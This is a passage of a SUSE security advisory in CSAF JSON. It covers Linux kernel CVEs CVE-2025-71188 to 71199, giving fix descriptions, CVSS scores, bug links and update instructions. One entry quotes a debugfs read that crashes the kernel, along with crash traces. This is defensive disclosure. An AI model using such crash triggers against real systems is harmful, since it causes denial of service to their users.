"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndmaengine: lpc18xx-dmamux: fix device leak on route allocation\n\nMake sure to drop the reference taken when looking up the DMA mux\nplatform device during route allocation.\n\nNote that holding a reference to a device does not prevent its driver\ndata from going away so there is no point in keeping the reference.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71188",
"url": "https://www.suse.com/security/cve/CVE-2025-71188"
},
{
"category": "external",
"summary": "SUSE Bug 1257576 for CVE-2025-71188",
"url": "https://bugzilla.suse.com/1257576"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-71188"
},
{
"cve": "CVE-2025-71189",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71189"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndmaengine: dw: dmamux: fix OF node leak on route allocation failure\n\nMake sure to drop the reference taken to the DMA master OF node also on\nlate route allocation failures.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71189",
"url": "https://www.suse.com/security/cve/CVE-2025-71189"
},
{
"category": "external",
"summary": "SUSE Bug 1257573 for CVE-2025-71189",
"url": "https://bugzilla.suse.com/1257573"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.3,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "low"
}
],
"title": "CVE-2025-71189"
},
{
"cve": "CVE-2025-71190",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71190"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndmaengine: bcm-sba-raid: fix device leak on probe\n\nMake sure to drop the reference taken when looking up the mailbox device\nduring probe on probe failures and on driver unbind.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71190",
"url": "https://www.suse.com/security/cve/CVE-2025-71190"
},
{
"category": "external",
"summary": "SUSE Bug 1257580 for CVE-2025-71190",
"url": "https://bugzilla.suse.com/1257580"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.3,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "low"
}
],
"title": "CVE-2025-71190"
},
{
"cve": "CVE-2025-71191",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71191"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndmaengine: at_hdmac: fix device leak on of_dma_xlate()\n\nMake sure to drop the reference taken when looking up the DMA platform\ndevice during of_dma_xlate() when releasing channel resources.\n\nNote that commit 3832b78b3ec2 (\"dmaengine: at_hdmac: add missing\nput_device() call in at_dma_xlate()\") fixed the leak in a couple of\nerror paths but the reference is still leaking on successful allocation.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71191",
"url": "https://www.suse.com/security/cve/CVE-2025-71191"
},
{
"category": "external",
"summary": "SUSE Bug 1257579 for CVE-2025-71191",
"url": "https://bugzilla.suse.com/1257579"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.3,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "low"
}
],
"title": "CVE-2025-71191"
},
{
"cve": "CVE-2025-71192",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71192"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nALSA: ac97: fix a double free in snd_ac97_controller_register()\n\nIf ac97_add_adapter() fails, put_device() is the correct way to drop\nthe device reference. kfree() is not required.\nAdd kfree() if idr_alloc() fails and in ac97_adapter_release() to do\nthe cleanup.\n\nFound by code review.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71192",
"url": "https://www.suse.com/security/cve/CVE-2025-71192"
},
{
"category": "external",
"summary": "SUSE Bug 1257679 for CVE-2025-71192",
"url": "https://bugzilla.suse.com/1257679"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-71192"
},
{
"cve": "CVE-2025-71194",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71194"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: fix deadlock in wait_current_trans() due to ignored transaction type\n\nWhen wait_current_trans() is called during start_transaction(), it\ncurrently waits for a blocked transaction without considering whether\nthe given transaction type actually needs to wait for that particular\ntransaction state. The btrfs_blocked_trans_types[] array already defines\nwhich transaction types should wait for which transaction states, but\nthis check was missing in wait_current_trans().\n\nThis can lead to a deadlock scenario involving two transactions and\npending ordered extents:\n\n 1. Transaction A is in TRANS_STATE_COMMIT_DOING state\n\n 2. A worker processing an ordered extent calls start_transaction()\n with TRANS_JOIN\n\n 3. join_transaction() returns -EBUSY because Transaction A is in\n TRANS_STATE_COMMIT_DOING\n\n 4. Transaction A moves to TRANS_STATE_UNBLOCKED and completes\n\n 5. A new Transaction B is created (TRANS_STATE_RUNNING)\n\n 6. The ordered extent from step 2 is added to Transaction B\u0027s\n pending ordered extents\n\n 7. Transaction B immediately starts commit by another task and\n enters TRANS_STATE_COMMIT_START\n\n 8. The worker finally reaches wait_current_trans(), sees Transaction B\n in TRANS_STATE_COMMIT_START (a blocked state), and waits\n unconditionally\n\n 9. However, TRANS_JOIN should NOT wait for TRANS_STATE_COMMIT_START\n according to btrfs_blocked_trans_types[]\n\n 10. Transaction B is waiting for pending ordered extents to complete\n\n 11. Deadlock: Transaction B waits for ordered extent, ordered extent\n waits for Transaction B\n\nThis can be illustrated by the following call stacks:\n CPU0 CPU1\n btrfs_finish_ordered_io()\n start_transaction(TRANS_JOIN)\n join_transaction()\n # -EBUSY (Transaction A is\n # TRANS_STATE_COMMIT_DOING)\n # Transaction A completes\n # Transaction B created\n # ordered extent added to\n # Transaction B\u0027s pending list\n btrfs_commit_transaction()\n # Transaction B enters\n # TRANS_STATE_COMMIT_START\n # waiting for pending ordered\n # extents\n wait_current_trans()\n # waits for Transaction B\n # (should not wait!)\n\nTask bstore_kv_sync in btrfs_commit_transaction waiting for ordered\nextents:\n\n __schedule+0x2e7/0x8a0\n schedule+0x64/0xe0\n btrfs_commit_transaction+0xbf7/0xda0 [btrfs]\n btrfs_sync_file+0x342/0x4d0 [btrfs]\n __x64_sys_fdatasync+0x4b/0x80\n do_syscall_64+0x33/0x40\n entry_SYSCALL_64_after_hwframe+0x44/0xa9\n\nTask kworker in wait_current_trans waiting for transaction commit:\n\n Workqueue: btrfs-syno_nocow btrfs_work_helper [btrfs]\n __schedule+0x2e7/0x8a0\n schedule+0x64/0xe0\n wait_current_trans+0xb0/0x110 [btrfs]\n start_transaction+0x346/0x5b0 [btrfs]\n btrfs_finish_ordered_io.isra.0+0x49b/0x9c0 [btrfs]\n btrfs_work_helper+0xe8/0x350 [btrfs]\n process_one_work+0x1d3/0x3c0\n worker_thread+0x4d/0x3e0\n kthread+0x12d/0x150\n ret_from_fork+0x1f/0x30\n\nFix this by passing the transaction type to wait_current_trans() and\nchecking btrfs_blocked_trans_types[cur_trans-\u003estate] against the given\ntype before deciding to wait. This ensures that transaction types which\nare allowed to join during certain blocked states will not unnecessarily\nwait and cause deadlocks.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71194",
"url": "https://www.suse.com/security/cve/CVE-2025-71194"
},
{
"category": "external",
"summary": "SUSE Bug 1257687 for CVE-2025-71194",
"url": "https://bugzilla.suse.com/1257687"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-71194"
},
{
"cve": "CVE-2025-71195",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71195"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndmaengine: xilinx: xdma: Fix regmap max_register\n\nThe max_register field is assigned the size of the register memory\nregion instead of the offset of the last register.\nThe result is that reading from the regmap via debugfs can cause\na segmentation fault:\n\ntail /sys/kernel/debug/regmap/xdma.1.auto/registers\nUnable to handle kernel paging request at virtual address ffff800082f70000\nMem abort info:\n ESR = 0x0000000096000007\n EC = 0x25: DABT (current EL), IL = 32 bits\n SET = 0, FnV = 0\n EA = 0, S1PTW = 0\n FSC = 0x07: level 3 translation fault\n[...]\nCall trace:\n regmap_mmio_read32le+0x10/0x30\n _regmap_bus_reg_read+0x74/0xc0\n _regmap_read+0x68/0x198\n regmap_read+0x54/0x88\n regmap_read_debugfs+0x140/0x380\n regmap_map_read_file+0x30/0x48\n full_proxy_read+0x68/0xc8\n vfs_read+0xcc/0x310\n ksys_read+0x7c/0x120\n __arm64_sys_read+0x24/0x40\n invoke_syscall.constprop.0+0x64/0x108\n do_el0_svc+0xb0/0xd8\n el0_svc+0x38/0x130\n el0t_64_sync_handler+0x120/0x138\n el0t_64_sync+0x194/0x198\nCode: aa1e03e9 d503201f f9400000 8b214000 (b9400000)\n---[ end trace 0000000000000000 ]---\nnote: tail[1217] exited with irqs disabled\nnote: tail[1217] exited with preempt_count 1\nSegmentation fault",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71195",
"url": "https://www.suse.com/security/cve/CVE-2025-71195"
},
{
"category": "external",
"summary": "SUSE Bug 1257704 for CVE-2025-71195",
"url": "https://bugzilla.suse.com/1257704"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-71195"
},
{
"cve": "CVE-2025-71196",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71196"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nphy: stm32-usphyc: Fix off by one in probe()\n\nThe \"index\" variable is used as an index into the usbphyc-\u003ephys[] array\nwhich has usbphyc-\u003enphys elements. So if it is equal to usbphyc-\u003enphys\nthen it is one element out of bounds. The \"index\" comes from the\ndevice tree so it\u0027s data that we trust and it\u0027s unlikely to be wrong,\nhowever it\u0027s obviously still worth fixing the bug. Change the \u003e to \u003e=.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71196",
"url": "https://www.suse.com/security/cve/CVE-2025-71196"
},
{
"category": "external",
"summary": "SUSE Bug 1257716 for CVE-2025-71196",
"url": "https://bugzilla.suse.com/1257716"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-71196"
},
{
"cve": "CVE-2025-71197",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71197"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nw1: therm: Fix off-by-one buffer overflow in alarms_store\n\nThe sysfs buffer passed to alarms_store() is allocated with \u0027size + 1\u0027\nbytes and a NUL terminator is appended. However, the \u0027size\u0027 argument\ndoes not account for this extra byte. The original code then allocated\n\u0027size\u0027 bytes and used strcpy() to copy \u0027buf\u0027, which always writes one\nbyte past the allocated buffer since strcpy() copies until the NUL\nterminator at index \u0027size\u0027.\n\nFix this by parsing the \u0027buf\u0027 parameter directly using simple_strtoll()\nwithout allocating any intermediate memory or string copying. This\nremoves the overflow while simplifying the code.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71197",
"url": "https://www.suse.com/security/cve/CVE-2025-71197"
},
{
"category": "external",
"summary": "SUSE Bug 1257743 for CVE-2025-71197",
"url": "https://bugzilla.suse.com/1257743"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-71197"
},
{
"cve": "CVE-2025-71198",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71198"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\niio: imu: st_lsm6dsx: fix iio_chan_spec for sensors without event detection\n\nThe st_lsm6dsx_acc_channels array of struct iio_chan_spec has a non-NULL\nevent_spec field, indicating support for IIO events. However, event\ndetection is not supported for all sensors, and if userspace tries to\nconfigure accelerometer wakeup events on a sensor device that does not\nsupport them (e.g. LSM6DS0), st_lsm6dsx_write_event() dereferences a NULL\npointer when trying to write to the wakeup register.\nDefine an additional struct iio_chan_spec array whose members have a NULL\nevent_spec field, and use this array instead of st_lsm6dsx_acc_channels for\nsensors without event detection capability.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71198",
"url": "https://www.suse.com/security/cve/CVE-2025-71198"
},
{
"category": "external",
"summary": "SUSE Bug 1257741 for CVE-2025-71198",
"url": "https://bugzilla.suse.com/1257741"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-71198"
},
{
"cve": "CVE-2025-71199",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71199"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\niio: adc: at91-sama5d2_adc: Fix potential use-after-free in sama5d2_adc driver\n\nat91_adc_interrupt can call at91_adc_touch_data_handler function\nto start the work by schedule_work(\u0026st-\u003etouch_st.workq).\n\nIf we remove the module which will call at91_adc_remove to\nmake cleanup, it will free indio_dev through iio_device_unregister but\nquite a bit later. While the work mentioned above will be used. The\nsequence of operations that may lead to a UAF bug is as follows:\n\nCPU0 CPU1\n\n | at91_adc_workq_handler\nat91_adc_remove |\niio_device_unregister(indio_dev) |\n//free indio_dev a bit later |\n | iio_push_to_buffers(indio_dev)\n | //use indio_dev\n\nFix it by ensuring that the work is canceled before proceeding with\nthe cleanup in at91_adc_remove.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71199",
"url": "https://www.suse.com/security/cve/CVE-2025-71199"
},
{
"category": "external",
"summary": "SUSE Bug 1257750 for CVE-2025-71199",
"url": "https://bugzilla.suse.com/1257750"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
